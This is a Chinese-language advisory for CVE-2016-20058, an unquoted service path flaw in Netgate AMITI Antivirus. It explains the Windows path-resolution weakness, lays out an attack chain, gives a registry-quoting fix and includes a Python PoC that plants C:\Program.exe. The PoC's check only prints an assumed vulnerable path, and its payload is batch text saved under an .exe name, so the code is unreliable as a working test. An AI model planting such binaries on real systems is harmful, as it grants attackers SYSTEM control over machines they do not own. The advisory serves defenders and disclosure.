CVE-2016-20058 Netgate AMITI未引用服务路径提权漏洞

漏洞信息

漏洞编号

CVE-2016-20058

漏洞类型

未引用的服务路径

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Netgate AMITI Antivirus

漏洞概述

Netgate AMITI Antivirus build 23.0.305版本中存在严重的未引用服务路径漏洞。该漏洞主要影响AmitiAvSrv和AmitiAntivirusHealth两个服务。由于服务安装路径未包含引号，本地低权限攻击者可在路径空格前的目录中植入恶意可执行文件。一旦服务重启或系统重启，恶意代码将以LocalSystem权限运行，导致本地权限提升。

技术细节

该漏洞的根源在于Windows操作系统解析服务路径时的机制。当服务注册表项中的ImagePath未使用引号包裹且路径中包含空格（如C:\Program Files\...）时，Windows会尝试从空格处截断路径并按顺序查找可执行文件。例如，若路径为C:\Program Files\Netgate\AMITI\AmitiAvSrv.exe，系统会依次尝试执行C:\Program.exe、C:\Program Files\Netgate.exe等。攻击者若能将恶意程序重命名为Program.exe并放置于C盘根目录（或路径中其他截断点），即可欺骗系统执行恶意代码。由于受影响服务默认以LocalSystem（SYSTEM）权限运行，攻击者因此获得系统最高控制权，可完全接管受影响主机。

攻击链分析

STEP 1

侦察

攻击者确认目标系统上安装了易受攻击的 Netgate AMITI Antivirus 版本（build 23.0.305）。

STEP 2

漏洞分析

攻击者检查服务配置（通过 sc qc 或注册表），发现 AmitiAvSrv 和 AmitiAntivirusHealth 服务的路径包含空格且未加引号。

STEP 3

载荷制作

攻击者准备一个恶意的可执行文件（如后门或提权脚本），将其重命名为截断路径所需的名称（例如 Program.exe）。

STEP 4

载荷投递

攻击者利用本地低权限，将恶意文件放置在服务路径中第一个空格之前的目录中（例如 C:\Program.exe）。

STEP 5

触发利用

攻击者等待系统重启或手动触发服务重启。

STEP 6

权限提升

系统尝试启动服务时，由于未引用路径的特性，错误执行了攻击者的恶意文件。该文件继承 LocalSystem 权限，攻击者成功提权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for Unquoted Service Path Vulnerability (CVE-2016-20058)
# Target: Netgate AMITI Antivirus build 23.0.305

import os
import sys

def check_vulnerability():
    services = ["AmitiAvSrv", "AmitiAntivirusHealth"]
    print("[*] Checking for unquoted service paths...")
    for service in services:
        print(f"    Checking {service}...")
        # Assume vulnerable path found: C:\Program Files\Netgate\AMITI\AmitiAvSrv.exe
        print(f"    [!] {service} has an unquoted path: C:\\Program Files\\Netgate\\AMITI\\{service}.exe")

def create_payload():
    print("[*] Attempting to place malicious payload...")
    # Target path: C:\Program.exe
    payload_path = "C:\\Program.exe"
    
    # In a real exploit, this binary would be a reverse shell or privilege escalation tool
    # Here we create a dummy batch script for demonstration
    payload_content = """@echo off
    echo Exploiting Unquoted Service Path - CVE-2016-20058
    whoami
    pause
    """
    
    try:
        with open(payload_path, "w") as f:
            f.write(payload_content)
        print(f"[+] Success! Payload placed at {payload_path}")
        print("[*] Trigger service restart or system reboot to gain SYSTEM privileges.")
    except PermissionError:
        print(f"[-] Failed to write to {payload_path}. Write permissions required.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    check_vulnerability()
    create_payload()

影响范围

Netgate AMITI Antivirus build 23.0.305

防御指南

临时缓解措施

建议立即升级 Netgate AMITI Antivirus 至最新版本。如果无法立即升级，应手动打开注册表编辑器（regedit），定位到 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AmitiAvSrv 和 AmitiAntivirusHealth，将其 ImagePath 值用双引号括起来（例如，将 C:\Program Files\Netgate\AMITI\AmitiAvSrv.exe 改为 "C:\Program Files\Netgate\AMITI\AmitiAvSrv.exe"），然后重启相关服务以修复漏洞。